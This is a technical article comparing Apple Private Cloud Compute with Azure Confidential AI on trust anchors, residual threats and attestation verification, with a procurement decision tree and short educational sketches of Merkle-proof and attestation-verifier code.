Every vendor behind a hardware root of trust is itself a trust anchor that nothing inside the architecture can close. AMD-as-signer through the PSP and VCEK certificate chains [@amd-kds]; Intel-as-signer for the TDX Module, SEAMLDR, and Provisioning Service; NVIDIA-as-signer for the on-die RoT and NRAS; Microsoft-as-signer for the MAA service [@ms-maa-overview]; and Apple-as-signer for the SEP-bound CA and the Apple-controlled Transparency Log [@apple-pcc-blog]. If any of those signing infrastructures is compromised, the architecture cannot defend itself against the signer. PCC's trust root collapses to Apple; Azure's spreads across four vendors but each one is still a trust anchor for the workload that depends on it.

3. ROM-burned single-signer revocation

Fuse-burned silicon roots of trust are not field-revocable on a chip already deployed. If an attacker recovers a vendor-signing key that has been burned into the boot ROM of millions of chips, the recovery path is fleet rotation, not credential revocation. This is not a flaw of any specific vendor; it is a property of how hardware roots of trust are physically anchored. The recovery model for a leaked AMD ARK key, an Intel SEAM key, or an Apple SEP signing key is the same: replace the silicon. That is a multi-quarter operation at fleet scale.

4. Supply-chain compromise of the AI model

Apple binds the model into the attested image hash. The same Transparency Log that proves what code is running also proves what model weights are running, because the model is part of the published image [@apple-pcc-blog] [@apple-pcc-release-transparency]. PCC closes the model supply-chain question at the architecture level.

Azure shifts model integrity to customer-controlled SKR of model artefacts. The model weights become encrypted blobs that the workload unwraps inside the TEE using a customer-managed key released only on a satisfying MAA JWT [@ms-cc-overview] [@ms-workshop-llm]. The customer is the trust anchor for the model's identity, not the cloud provider. This is a different trust-rooting model -- not stronger or weaker in the abstract, but routed through different organizations. It is not accurate to say only Apple defends against model supply-chain compromise.

5. Prompt-output exfiltration via the model itself

The TEE protects the input boundary -- it can prove the cloud operator never saw the prompt. It does not constrain what the model puts in the output. A model that is fine-tuned, prompt-injected, or simply chooses to emit memorised data can exfiltrate information through its own output channel, and no architectural primitive in either PCC or Azure CC-AI prevents that. Both architectures are equally exposed on this axis. This is also why prompt-output safety, content filtering, and model-side privacy controls are unrelated work that confidential computing does not subsume.

6. Compelled vendor and lawful access

A property of the trust-rooting model, not of any one architecture. If a vendor is compelled by law to push a software update that exfiltrates user data, the architecture cannot defend itself against that vendor. PCC's compelled-vendor exposure is concentrated on Apple. Azure's is distributed across AMD, Intel, NVIDIA, and Microsoft, but a compelled Microsoft is sufficient to compromise an MAA-rooted workload; the diffusion does not multiply protections.

And one more: MAA-as-service compromise

Azure's centralised verifier is a control point Apple does not have, because Apple's verifier is the user's device itself. If MAA is compromised -- if an attacker controls the MAA signing key, or if the MAA policy-evaluation code is modified maliciously -- every relying party that trusts MAA-issued JWTs trusts the attacker.

The CCC's "A Technical Analysis of Confidential Computing" v1.3 explicitly enumerates side-channels as a residual risk that the architecture does not close by construction. This is the field's own acknowledged lower bound. Any product claim that "our confidential computing stack defends against all side-channels" is, in 2026, either overstated or contradicting the CCC's own technical analysis [@ccc-technical-analysis]. The honest framing is that confidential computing defends against the architecturally-named threats (memory disclosure to the operator, hypervisor-mediated remap, plaintext-in-DRAM at-rest exposure) and that side-channels remain a separate research and engineering domain.

Threat	Apple PCC	Azure CC-AI
Malicious cloud operator (passive memory disclosure)	Defended (SEP-rooted attestation, OHTTP relay) [@apple-pcc-blog]	Defended (SEV-SNP / TDX guest measurement, MAA verifier) [@ms-maa-overview]
Compromised hypervisor (active remap / Iago attacks)	Defended (Apple-controlled kernel + SEP-rooted measured boot) [@apple-pcc-blog]	Defended (SEV-SNP RMP enforces page ownership; TDX Module isolates) [@ms-cc-overview]
Supply-chain compromise of the AI model	Defended at architecture level (model bound into Transparency-Log-published image) [@apple-pcc-blog]	Defended via customer-controlled SKR of model artefacts; trust shifts to customer [@ms-workshop-llm]
Side-channels on shared silicon	Not closed by construction [@ccc-technical-analysis] [@plundervolt]	Not closed by construction [@ccc-technical-analysis] [@cipherleaks]
Compelled-vendor / lawful access	Not closed by construction (trust collapses to Apple)	Not closed by construction (trust spreads across four vendors; compelled MAA suffices)
Verifier / signer compromise	Apple SEP-CA + Transparency Log signer is a control point	MAA signer + AMD / Intel / NVIDIA signers are control points
Prompt-output exfiltration via model	Not closed by construction	Not closed by construction

Note: Neither architecture closes the gap by construction. Apple's verifier is the user's device, and the user's device trusts Apple's SEP-bound CA and the Apple-controlled Transparency Log signer. Azure's verifier is MAA, which is a Microsoft-operated service with its own signing infrastructure. Apple's single-vendor problem and Microsoft's centralised-verifier problem are two shapes of the same architectural gap: the verifier itself is a trust root the architecture cannot externally audit.

Key idea: Trust diffusion (Azure's contribution) and verifiable transparency (Apple's contribution) close different trust-anchor gaps. Neither closes both. No production substrate as of mid-2026 closes both gaps simultaneously. A hypothetical Generation-7 design that combined Azure-style multi-vendor TEE composition with Apple-style append-only transparency of production images would close that gap. No vendor has shipped it.

Two architectures, two distinct upper bounds, neither closing the same gap. So what is the field actually working on?

9. Where Active Work Is Happening

September 5, 2024, arXiv. Ceren Kocaoğullar (University of Cambridge), Tina Marjanov (Cambridge), Ivan Petrov (Google), Ben Laurie (Google), Al Cutter (Google), Christoph Kern (Google), Alice Hutchings (Cambridge), and Alastair R. Beresford (Cambridge) post "A Confidential Computing Transparency Framework for a Trust Chain" [@kocaogullar-transparency]. The paper does not name MAA specifically. It generalises the question Apple PCC raises in concrete form: can the verifiable-transparency primitive be replicated on commodity multi-vendor silicon without collapsing to a single trust root? The authors propose "a three-level conceptual framework providing organisations with a practical pathway to incrementally improve Confidential Computing transparency" [@kocaogullar-transparency]. The inclusion of Ben Laurie -- one of the original architects of Certificate Transparency (RFC 6962) -- is not incidental. The paper is the direct architectural descendant of CT brought into the confidential-computing domain.

The v2 December 5, 2024 revision of the Kocaoğullar et al. paper added an 800+ participant empirical study showing that greater transparency improves end-user trust in confidential computing services [@kocaogullar-transparency]. That empirical signal is the closest thing the field has, as of mid-2026, to a measurement of the procurement consequences of verifiable transparency vs verifier-as-a-service. The framework itself is conceptual; the empirical contribution is the part procurement teams should read.

Six open problems are visible in the current production work.

9.1 Verifiable transparency of the verifier itself

No major-cloud verifier ships a public append-only log of its own code. MAA does not; Google Cloud Attestation does not; AWS Nitro's hypervisor signer does not. The Intel Trust Authority integration on GCP introduces a second verifier, which is a partial cross-check, but a second verifier is not the same architectural primitive as a transparency log [@ita-gcp]. Where the work is happening: the CCC Attestation Special Interest Group on GitHub coordinates Formal Specifications of Attestation Mechanisms, an RA-TLS proof of concept, an interoperable RA-TLS effort, an IETF RATS terms cheat sheet, and a formal-spec-KBS (key broker service) project [@ccc-attestation-gh]. The IETF RATS Working Group continues to extend RFC 9334 with Entity Attestation Token (EAT) and Concise Reference Integrity Manifest (CoRIM) drafts [@ietf-rfc9334].

9.2 GPU confidential-computing parity across vendors

NVIDIA H100 CC-On is the only confidential-GPU mode at GA on a major commercial cloud as of mid-2026 [@nvidia-dev-blog] [@ms-sku-nccads]. AMD MI300X ships as compute across multiple clouds but has no production-equivalent SEV-TIO confidential-GPU mode at GA on a major commercial cloud. PCIe TDISP and SEV-TIO Linux support is landing in 2025-2026 kernels, but the GA gap is the load-bearing fact for any procurement that wants AMD silicon end-to-end. AMD's MI400X-class roadmap is forward-looking. Until a second confidential GPU is at GA, single-vendor lock-in at the accelerator tier is the unavoidable procurement reality for any cloud confidential-AI workload.

9.3 Cross-vendor attestation portability

IETF RFC 9334 standardises the vocabulary [@ietf-rfc9334]; CoRIM and EAT, in active drafting in the IETF RATS WG, aim at portable claim formats. The vocabulary work matters because a confidential workload that wants to run unchanged on Azure SEV-SNP and Azure TDX and GCP TDX needs a single attestation parser that understands all three evidence formats. The MAA approach maps onto RFC 9334's Passport pattern; the GCA approach maps onto OIDC tokens that play well with federated-identity tooling. As of mid-2026 no single relying-party library handles all three production verifiers transparently, and that is one of the things the CCC Attestation SIG is working on [@ccc-attestation-gh].

9.4 Confidential inferencing for Azure OpenAI models

Microsoft's Azure-Samples/confidential-ai-workshop repository [@ms-workshop] is the cleanest procurement-grade reference for what confidential inferencing actually looks like in production on Azure today. It contains three end-to-end tutorials at three different points on the cost-versus-isolation curve, and reading them in sequence is the fastest way for a procurement team to map the abstract architecture to concrete SKU lines.

Tutorial 1: ML-training on a CPU-only confidential VM (Standard_DCasv5). The confidential-ml-training directory walks training of an XGBoost-class classical-ML model on a Standard_DCasv5 SKU, which is an AMD SEV-SNP confidential VM without a confidential GPU [@ms-workshop-ml]. The workload posture is plaintext-data-and-model on a TEE-protected substrate, with the SEV-SNP attestation gating access to encrypted training data in Azure Storage via the standard MAA + SKR path. The deliberate choice of XGBoost over a deep-learning model is the architectural lesson: when the model and training data fit in CPU memory and TCB-sealed CPU compute is sufficient, the confidential GPU SKU is overkill. This is the lowest-cost on-ramp into the architecture.

Tutorial 2: LLM inferencing on a confidential GPU (Standard_NCC40ads_H100_v5). The confidential-llm-inferencing directory walks serving microsoft/Phi-4-mini-reasoning on a Standard_NCC40ads_H100_v5 SKU [@ms-workshop-llm]. Phi-4-mini-reasoning is a 3.8 B-parameter dense decoder-only Transformer with a 128 K-token context window, MIT-licensed on Hugging Face [@hf-phi4-mini], chosen because it fits comfortably in the H100 NVL's 94 GB HBM3 capacity with room for activation memory. The novel architectural feature here is double attestation: the tutorial's setup script uses Azure/az-cgpu-onboarding [@az-cgpu-onboarding] to verify both the SEV-SNP CVM attestation (against AMD VCEK) and the NVIDIA H100 GPU attestation (against NVIDIA's on-die root of trust via NRAS) before model weights are released from Azure Key Vault Premium via SKR. This is the architectural pattern any production GPU-confidential workload should match.

Tutorial 3: Inferencing via the Confidential Whisper service (OHTTP + HPKE). Whisper, the speech-to-text model, is the publicly-demoed Microsoft Build 2024 confidential inferencing reference workload. The confidential-whisper-inferencing tutorial directory confirms the Azure AI Foundry Confidential Whisper service uses Oblivious HTTP with HPKE end-to-end encryption to keep audio encrypted until it reaches the TEE-protected Whisper model [@ms-workshop-whisper]. The reference OHTTP gateway implementation is microsoft/attested-ohttp-client and its server-side counterpart, "an Attested OHTTP gateway and client implementation by Microsoft" that "uses the Cloudflare OHTTP client/server implementation as a basis" [@ms-attested-ohttp]. This is the closest architectural pattern Azure has to PCC's non-targetability requirement -- a third-party-operated OHTTP relay strips the client IP before the request reaches the confidential inferencing endpoint, the same architectural primitive Apple uses for PCC at network ingress.

The three tutorials are the canonical references because they walk the wire-level flow. A procurement team that wants to know "what does confidential inferencing actually look like on Azure" can read the README files, the Bicep templates, the attestation-policy JSON, and the SKR-policy JSON, and answer the question without speculation. GPT-class confidential endpoints staging through 2024-2026 are forward-looking roadmap. There is no May-2024 GA for "Confidential GPT-4," but the three workshop tutorials cover the architectural primitives that such a GA would compose.

9.5 The Apple PCC node-chip transition

Apple has not publicly named the chip family used in PCC nodes. Firmware identifiers and independent analyses make the transition story concrete enough to reason about. At launch in June 2024 the PCC nodes ran on M2-Ultra-class silicon, identified by the firmware string ComputeModule14,1 visible in independent device-identifier databases [@appledb-cm14]. During 2026 the PCC fleet transitioned to a new node generation identified as J226C and reported (independently, not by Apple) as built around M5-class silicon manufactured in Houston, Texas [@nine-to-five-mac-m5] [@winbuzzer-m5]. The 9to5Mac report dated February 17, 2026 describes Apple's M5-based Private Cloud Compute servers tied to iOS 26.4 [@nine-to-five-mac-m5], and the parallel Winbuzzer coverage from the next day confirms a new "Private Cloud Compute Agent Worker" component running on M5-class node hardware [@winbuzzer-m5].

What is architecturally interesting is not the chip identity. It is what the transition did not change. The Transparency Log architecture absorbs a generational chip change as a matter of routine policy because the log's verifier policy is a list of approved image hashes and the SEP-rooted attestation envelope structure, not a list of approved chip families. New node generation, new image hashes (visible in PrivateCloudCompute/Release.swift and validated by PrivateCloudCompute/NodeValidator.swift [@apple-pcc-nodevalidator] [@apple-pcc-release-swift]), same envelope structure, same client-side verification. From a procurement-trust perspective, the transition was an architectural non-event in exactly the way Apple's public commitments said it should be.

**Two invariants held across the M2-Ultra to M5 node transition.** First, the device-side envelope check is stable: the `NodeValidator` validates SEP-signed attestation against the `SEPAttestationPolicy` it parses from the release artefact [@apple-pcc-nodevalidator] [@apple-pcc-sepattestpolicy], and the policy schema did not change. Second, the public transparency log absorbed the transition without any client-side trust ceremony because the chip family is not in the verifier policy -- only the image hash is. A device that started talking to the M2-Ultra fleet in 2024 and woke up in 2026 talking to the M5 fleet did exactly one new thing: it fetched the new approved image hashes from the log. **Three things did change.** First, the on-node software stack (firmware, kernel, OS, inference runtime) is rebuilt for the new silicon; that is why the image hashes change. Second, the routing policy may shift -- some workloads may schedule onto the new node generation preferentially. Third, the chip family itself is not publicly named by Apple; the M5 identification is inferential from independent reporting plus firmware identifiers, not from a primary Apple source. Procurement narratives should use "Apple-designed silicon, not publicly named" when precision matters, and reach for the inferential M5 identification only when chip-family granularity is load-bearing.

Key idea: The architectural payoff of a public transparency log is precisely that it absorbs a generational chip transition without any client-side trust ceremony, because the chip family is not in the verifier policy -- only the image hash is. This is what "verifiable transparency" buys procurement teams in practice: the trust contract survives silicon turnover because the contract was never about silicon. It was about which bits the silicon ran.

9.6 Third-party PCC equivalents

Could AWS or Google replicate Apple's Transparency-Log model on commodity multi-vendor silicon? The architectural feasibility is open. The Kocaoğullar et al. framework provides a conceptual pathway [@kocaogullar-transparency]. The CCC Attestation SIG's interoperable-ra-tls work is one of several substrates that a multi-vendor transparency log could ride on top of [@ccc-attestation-gh]. Whether any major cloud will actually ship it is the architectural bet the next generation hinges on. No GA product as of mid-2026.

A regulated workload that needs second-source availability has to be able to run on at least two confidential substrates. As of mid-2026 the practical cross-vendor option for a TEE-based confidential workload is "AMD SEV-SNP on Azure, Intel TDX on GCP, AWS Nitro on AWS" -- three different attestation evidence formats consumed by three different verifiers. CoRIM and EAT in the IETF RATS WG are trying to make those three formats parseable by one library. Until that lands, second-source confidential AI is an integration project, not a configuration change.

The field is wide open. But the reader's procurement deadline is not. How do you actually choose between PCC and Azure today?

10. A Procurement Decision Tree

Six questions, asked in order. The first determines whether PCC is even in play; the rest sharpen the choice.

Question 1: Do you control the device that originates the request, and is it Apple-Intelligence-capable?

PCC requires Apple-Intelligence-capable client devices. The supported set as of mid-2026 is iPhone 15 Pro and later, iPads on M1 silicon or later, and Macs on M1 silicon or later [@apple-pcc-blog]. If your end users are on Windows laptops, Android phones, browsers, or any non-Apple endpoint, PCC is out of scope by construction. Azure / GCP / AWS confidential AI workloads do not have an analogous client-side requirement -- they are workload-shape-agnostic and the client can be any HTTPS-speaking device.

Question 2: Can you accept Apple-as-signer as the trust root?

PCC's trust collapses to Apple's signing infrastructure. The SEP-bound CA, the Apple-operated Transparency Log signer, the Apple bug-bounty program, and the Apple Security Engineering and Architecture team are the entire trust root [@apple-pcc-blog]. Azure spreads trust across AMD plus Intel plus NVIDIA plus Microsoft as separate signers [@ms-maa-overview] [@amd-kds] [@nvidia-dev-blog]. If your security posture explicitly requires multi-vendor trust diffusion -- for example, because your regulator does not accept single-vendor SBOMs as evidence -- Azure wins this axis (see §6 for the architectural reasoning).

Question 3: Do you need customer-managed key material?

Azure: yes, via SKR from Azure Key Vault Premium or Azure Managed HSM, with a release policy bound to MAA-issued claims [@ms-cc-overview] [@ms-maa-overview]. Apple: no by design, because PCC nodes are stateless and there is no customer key material on the node to be released [@apple-pcc-blog]. Regulated buyers whose framework requires customer-held keys -- for example, a FIPS 140-3 Level 3 customer-key-escrow requirement -- cannot map PCC into that framework, because PCC does not have the architectural primitive the framework is asking for.

Question 4: Do you need verifiable transparency of the actually-running code?

Apple: yes, via the published Transparency Log [@apple-pcc-release-transparency]. Azure: not via the architecture itself. You can build a customer-side log of the MAA tokens you have observed, or you can accept MAA's claims at face value. There is no Azure architectural primitive that proves the bits MAA verified are the same bits the workload is actually executing today, in the way that PCC's Transparency Log proves the image hash served to you is the same one served to every other PCC user.

This is the one axis where the architectures differ in kind. If your threat model requires that you be able to confirm what code the cloud is running, not just that the cloud says it is running specific code, PCC is the only production answer.

Question 5: Do you need GPU-class confidential compute?

Both ship it. Pay attention to two facts. First, Azure's confidential GPU is H100 only at GA in mid-2026 [@nvidia-dev-blog] [@ms-sku-nccads]. AMD MI300X CC-On is not at GA on a major commercial cloud; NVIDIA H200 and Blackwell-class GB200 GPUs are GA on Azure as non-confidential SKUs. If you need confidential GPU compute, the only major-cloud answer is NCCads_H100_v5 (or its successor). Second, Apple's GPU is integrated on the SoC and is inside the SEP-rooted attestation envelope by construction; there is no separate cross-vendor GPU attestation step, which simplifies the trust analysis at the cost of being available only on the Apple stack.

Question 6: What does your auditor accept as evidence?

The MAA JWT is consumable by every off-the-shelf JWT verifier. It is also broadly accepted in regulated audits because the JWT format and the x-ms-* claim names are documented in publicly-fetchable Microsoft Learn pages [@ms-maa-overview], and auditors can map MAA tokens onto NIST SP 800-53 attestation evidence requirements without exotic tooling.

PCC's Transparency Log proof is newer. An audit that accepts a Merkle inclusion proof against an Apple-published log root as evidence is uncommon as of mid-2026; most regulated audit programs were designed before such a primitive existed in cloud AI. If your auditor needs PCC evidence, expect to write explainer documentation that translates "your image hash is in append-only public log at Merkle position N with signed root R" into the language your audit framework uses.

{` // Sketch of a Certificate-Transparency-style Merkle inclusion proof check. // The PCC Transparency Log inherits this structural primitive from RFC 6962. // This is educational -- a production verifier would use a maintained library.

const sha256Hex = async (data) => { const bytes = typeof data === 'string' ? new TextEncoder().encode(data) : data; const buf = await crypto.subtle.digest('SHA-256', bytes); return [...new Uint8Array(buf)].map((b) => b.toString(16).padStart(2, '0')).join(''); };

const concat = (a, b) => { const out = new Uint8Array(a.length + b.length); out.set(a); out.set(b, a.length); return out; };

async function verifyInclusion(leafHashHex, leafIndex, treeSize, sibling, root) { // sibling is the audit path (array of sibling node hashes, leaf to root) let node = Uint8Array.from(leafHashHex.match(/.{2}/g).map(h => parseInt(h, 16))); let idx = leafIndex; let size = treeSize; for (const s of sibling) { const sBytes = Uint8Array.from(s.match(/.{2}/g).map(h => parseInt(h, 16))); // RFC 6962 prefixes internal hashes with 0x01 const prefixed = (left, right) => concat(new Uint8Array([0x01]), concat(left, right)); const combined = (idx % 2 === 0) ? prefixed(node, sBytes) : prefixed(sBytes, node); const h = await sha256Hex(combined); node = Uint8Array.from(h.match(/.{2}/g).map(x => parseInt(x, 16))); idx = Math.floor(idx / 2); size = Math.floor((size + 1) / 2); } const computedRoot = [...node].map((b) => b.toString(16).padStart(2, '0')).join(''); return computedRoot === root; }

// In production: fetch (signed log root, audit path) from the log // and the leaf hash from the attestation envelope's image-hash field. // If verifyInclusion returns true AND the signed root matches what your // device trusts, the image you are about to talk to is in the public log. console.log('Educational sketch only; use a maintained CT library in production.'); `}

The decision tree in one diagram

flowchart TD Q1{"Apple-Intelligence-capable
client device required?"} Q2{"Single-vendor (Apple)
trust root acceptable?"} Q3{"Customer-managed key
material required?"} Q4{"Need public-log
verifiable transparency?"} Q5{"Need GPU TEE
at fleet scale?"} Q6{"Auditor accepts
Merkle inclusion proof?"} Q1 -->|No| AZ[Azure / GCP / AWS] Q1 -->|Yes| Q2 Q2 -->|No| AZ Q2 -->|Yes| Q3 Q3 -->|Yes| AZ Q3 -->|No| Q4 Q4 -->|Yes| Q5 Q4 -->|No| AZ Q5 -->|Yes, Apple integrated GPU OK| PCC[Apple PCC] Q5 -->|Yes, need NVIDIA H100| AZ PCC --> Q6 Q6 -->|Yes| PCC2[PCC fits the audit posture] Q6 -->|No| PCC3[Write explainer documentation,
or fall back to Azure JWT-based evidence] The MAA JWT maps cleanly onto NIST SP 800-53 SA-12 (Supply Chain Protection) and SC-12 (Cryptographic Key Establishment and Management) evidence requirements, because the JWT format and the claim semantics are publicly documented and JWT verifiers are standard library code [@ms-maa-overview]. PCC's Transparency Log evidence is newer; SA-12-style framings exist for Certificate Transparency in the web-PKI context but not yet (as of mid-2026) as a recognised confidential-AI evidence pattern. Expect explainer documentation to be required. Both architectures interact with FedRAMP, but Azure's confidential AI offerings are further along the FedRAMP path because Microsoft's broader Azure compliance suite is older. Azure is the first cloud provider to offer confidential computing with NVIDIA H100 GPUs. -- NVIDIA Blog, September 24, 2024 [@nvidia-h100-ga]

What the verifier actually does, on the wire

Once procurement has chosen the architecture, an engineer somewhere has to write the verifier. The two architectures end up being symmetric in this regard: each produces a cryptographic envelope, and a relying party has to parse, validate signatures, and check inclusion or claims. Three procurement-grade reference primitives anchor the choice -- two from Azure (already shown above), one from Apple PCC.

On Azure, the relying party walks an MAA JWT verification flow (decode the JWT, validate signature against the MAA JWKS, match claims against an SKR release policy -- the JavaScript reference appears in §6 Axis 3 alongside the MAA JWT decode) [@ms-maa-overview]. For customers who want to not trust MAA, the alternative path uses snpguest to fetch the AMD VCEK chain and verify the SEV-SNP attestation directly (the bash reference also in §6 Axis 3) [@virtee-snpguest]. The two paths produce structurally equivalent confidence in the same evidence.

On Apple PCC, the relying-party verifier is PrivateCloudCompute/NodeValidator.swift and friends [@apple-pcc-nodevalidator]. The flow is: parse the AttestationBundle from the response (the bundle structure is defined in SEPAttestation.swift [@apple-pcc-sepattest]); call the SEP attestation context verifier (aks_attest_context_verify) on the SEP signature against the per-die Apple-rooted certificate chain; parse the Release.swift Release struct as ASN.1 DER and compute its SHA-256 digest [@apple-pcc-release-swift]; check the SEP attestation policy claims (SEPAttestationPolicy.swift [@apple-pcc-sepattestpolicy]) constrain the release digest; then call SWTransparencyVerifier.verifyExpiringInclusion to verify the release digest's inclusion proof in the public transparency log [@apple-pcc-swtrans-verifier] [@apple-pcc-transparencypolicy]. The full reference is the apple/private-cloud-compute repository's VerifiableReleasesExtension directory and the VerifiableReleasesExtension tutorial [@apple-pcc-vre].

{`# This is a procurement-grade SKETCH, not production code. It walks the four

verification steps a real PCC client performs (see PrivateCloudCompute/ NodeValidator.swift for the canonical reference [@apple-pcc-nodevalidator]). Each function is a stub showing the contract the caller must satisfy.

from hashlib import sha256 from typing import Optional from dataclasses import dataclass

@dataclass class AttestationBundle: """The Apple PCC AttestationBundle, parsed from the response envelope. Structure defined in SEPAttestation.swift [@apple-pcc-sepattest].""" sep_signature: bytes sep_cert_chain: list release_der: bytes sep_attestation_policy_claims: dict transparency_inclusion_proof: dict

def aks_attest_context_verify( sep_signature: bytes, sep_cert_chain: list, apple_root_anchor: bytes, ) -> bool: """Step 1: verify the SEP signature against the per-die Apple-rooted certificate chain. In the real client this calls the Security framework's aks_attest_context_verify; the SEP cert chain is rooted at Apple's PCC CA. Returns True if the signature chains to the pinned anchor.""" raise NotImplementedError("calls Security.framework in a real client")

def compute_release_digest(release_der: bytes) -> bytes: """Step 2: the Release struct is serialised as ASN.1 DER; the canonical release digest is SHA-256 over the DER bytes. See Release.swift for the schema [@apple-pcc-release-swift].""" return sha256(release_der).digest()

def check_sep_attestation_policy( claims: dict, expected_release_digest: bytes, ) -> bool: """Step 3: the SEP attestation policy claims must constrain the release digest. See SEPAttestationPolicy.swift for the policy schema [@apple-pcc-sepattestpolicy]. A real client checks the policy version, the claimed release digest, and the attestation freshness window.""" claimed_digest = claims.get("release_digest") return claimed_digest == expected_release_digest

def verify_expiring_inclusion( release_digest: bytes, inclusion_proof: dict, log_witness_root: bytes, ) -> bool: """Step 4: verify the release digest's inclusion in the public PCC transparency log against a witness-cosigned tree head. Reference impl: SWTransparencyVerifier.verifyExpiringInclusion [@apple-pcc-swtrans-verifier] [@apple-pcc-transparencypolicy].""" raise NotImplementedError("merkle proof + cosigned witness check")

def verify_pcc_envelope( bundle: AttestationBundle, apple_root_anchor: bytes, log_witness_root: bytes, ) -> bool: """The four-step PCC verifier flow. Returns True only if every step passes. A real client refuses to send the user's prompt if this returns False.""" if not aks_attest_context_verify( bundle.sep_signature, bundle.sep_cert_chain, apple_root_anchor ): return False release_digest = compute_release_digest(bundle.release_der) if not check_sep_attestation_policy( bundle.sep_attestation_policy_claims, release_digest ): return False if not verify_expiring_inclusion( release_digest, bundle.transparency_inclusion_proof, log_witness_root ): return False return True `}

The symmetry is the procurement point. Azure: validate JWT signature against MAA JWKS, match claims against SKR policy. Apple PCC: validate SEP signature against Apple PCC CA, validate inclusion proof against transparency log witness root. Both are cryptographic; both produce a yes/no decision against a hardware-anchored chain of trust. The architectural difference is what the relying party is allowed to know: with PCC, the relying party knows the exact image hash that ran (because the log says so); with Azure, the relying party knows the workload met an MAA policy (because the JWT says so). The two are not interchangeable evidence, but the verifier code-paths are roughly the same shape.

The decision tree handles the typical questions. The atypical questions, and the misconceptions, are next.

11. Frequently Asked Questions

Yes, in both architectures, against the threats the architecture names. Apple PCC's SEP-rooted attestation envelope plus the Transparency Log refusal to forward to unlogged images defends against a malicious Apple operator passively reading prompts [@apple-pcc-blog]. Azure CC-AI's SEV-SNP RMP-enforced memory plus MAA-gated SKR defends against a malicious Microsoft operator on the SEV-SNP path [@ms-maa-overview]. Neither closes side-channels on shared silicon [@ccc-technical-analysis]; neither closes compelled-vendor or lawful-access exposure; neither closes prompt-output exfiltration via the model itself. The "the cloud cannot see your prompt" claim is true against the named threat model and not against every conceivable threat. Yes. The 2018-2020 cascade closed the SGX-era residuals -- Foreshadow / L1TF [@foreshadow], SgxPectre [@sgxpectre], Plundervolt (CVE-2019-11157) [@plundervolt] -- and the principled extension is that any TEE built on shared microarchitectural state inherits a similar surface. The CCC's "A Technical Analysis of Confidential Computing" v1.3 names this explicitly as a residual risk that the architecture does not close by construction [@ccc-technical-analysis]. CipherLeaks (USENIX Security 2021) demonstrated the same point on the AMD SEV side via a deterministic-ciphertext side channel [@cipherleaks]. Vendor microcode updates are an ongoing operational requirement, not a one-time fix. No. Per the `apple/security-pcc` README verbatim: "The publication of this code is intended for security research and verification purposes only" [@apple-pcc-github]. The publication's purpose is research-grade transparency -- so that an independent researcher can inspect what is running, exercise the architecture inside the Virtual Research Environment, and submit findings to the Apple Security Bounty program with rewards up to \$1,000,000 [@apple-pcc-research]. It is not a typical open-source contribution model and the license and intended use are explicitly different. The substantive thing PCC ships is verifiable transparency of the running fleet, not community-driven development. No. Both Linux and Windows guest OSes are supported on Azure confidential VMs, and the reference confidential-inferencing stack Microsoft publishes is Linux-based. The `microsoft/confidential-ai-workshop` repository contains three Linux-based tutorial directories: `confidential-llm-inferencing`, `confidential-whisper-inferencing`, and `confidential-ml-training`, with reusable modules for attestation, key management, key origin, model sourcing, and OS disk encryption [@ms-workshop]. The LLM inferencing tutorial deploys a `Standard_NCC40ads_H100_v5` confidential VM with a vLLM-plus-Streamlit-plus-Caddy stack [@ms-workshop-llm]. Windows is supported; Linux is the canonical reference. Confidential Containers is an orchestration-layer abstraction that maps Kubernetes pods onto Generation-3 confidential VMs running on AMD SEV-SNP, Intel TDX, or IBM Secure Execution [@coco-gh]. It composes on top of the same substrate Azure CC-AI uses. It does not compete with Apple PCC architecturally -- they live at different layers of the stack. A CoCo deployment on Azure can use MAA and SKR for its attestation and key-release primitives, and orchestration vendors like Edgeless Systems' Contrast wrap that pattern into a workload-level confidential-computing primitive on Kubernetes [@edgeless-contrast]. No. Both rest on vendor-controlled signing infrastructure. PCC's compelled-vendor exposure is concentrated on Apple, because the signer of every PCC attestation chain is Apple. Azure's is distributed across AMD, Intel, NVIDIA, and Microsoft, but a compelled Microsoft is sufficient to compromise an MAA-rooted workload because MAA is the single verifier whose JWT every downstream relying party trusts [@ms-maa-overview]. Trust diffusion across multiple vendors makes the *collapse* harder, but it does not make any one vendor's compelled-update path architecturally impossible. This is a property of the trust-rooting model, not a flaw of either architecture, and neither closes it by construction. No. The canonical late-2024 Mark Russinovich confidential-AI session is **Microsoft Ignite 2024 BRK430**, "Inside Azure Innovations with Mark Russinovich," also published on YouTube as "Confidential AI and Inference -- Inside Azure Innovations." Russinovich's "data in use" framing for confidential computing originally appeared in his September 14, 2017 Azure blog "Introducing Azure confidential computing," not in an academic OSDI venue [@ms-russinovich-2017]. Microsoft Build 2024's confidential-inferencing session was BRK227, "Inside AI Security with Mark Russinovich," which announced confidential inferencing for the Azure OpenAI Whisper speech-to-text model -- not for GPT-4, and not under the title "Confidential GPT" [@ms-workshop-whisper].

What to carry into the next conversation

Two architectures. One promise. One axis on which they differ in kind. The end-user pitch -- "the cloud cannot see your prompt" -- is now functionally identical across Apple Private Cloud Compute and Azure Confidential AI, but the architectural machinery underneath ships two genuinely different things. PCC ships verifiable transparency of the production fleet through an Apple-controlled stack and a public Transparency Log. Azure CC-AI ships multi-vendor trust diffusion plus customer-managed keys through AMD SEV-SNP plus NVIDIA H100 CC-On plus MAA plus SKR. Each closes a trust-anchor gap the other leaves open. Neither closes the gap the other closes. Neither closes the side-channel, compelled-vendor, or model-output exfiltration gaps -- the CCC's own v1.3 analysis names these as residual risks for any TEE-based design [@ccc-technical-analysis].

The next architectural generation -- the one that combines Azure-style multi-vendor TEE composition with Apple-style append-only transparency of production images -- would close the gap both leave open. The Kocaoğullar et al. transparency framework is the conceptual sketch [@kocaogullar-transparency]; the CCC Attestation SIG and the IETF RATS Working Group are where the production work is happening [@ccc-attestation-gh] [@ietf-rfc9334]. No vendor has shipped it.

For now, the load-bearing decision is the one Question 4 in §10 asks. If your threat model requires that you be able to confirm what code the cloud is actually running -- and not just that the cloud says it is running specific code -- PCC is the only production answer in mid-2026. If your threat model is satisfied by multi-vendor trust diffusion and a managed-verifier JWT, Azure CC-AI gives you a richer key-management story and broader silicon optionality. The architectures are not better and worse. They are answers to different questions. The first useful step in any confidential-AI procurement is naming which question you are actually trying to answer.

Mimikatz and the Credential-Theft Decade: The Windows Security Wars Part 3 (2009-2014)

noreply@paragmali.com (Parag Mali) — Sun, 31 May 2026 00:00:00 GMT

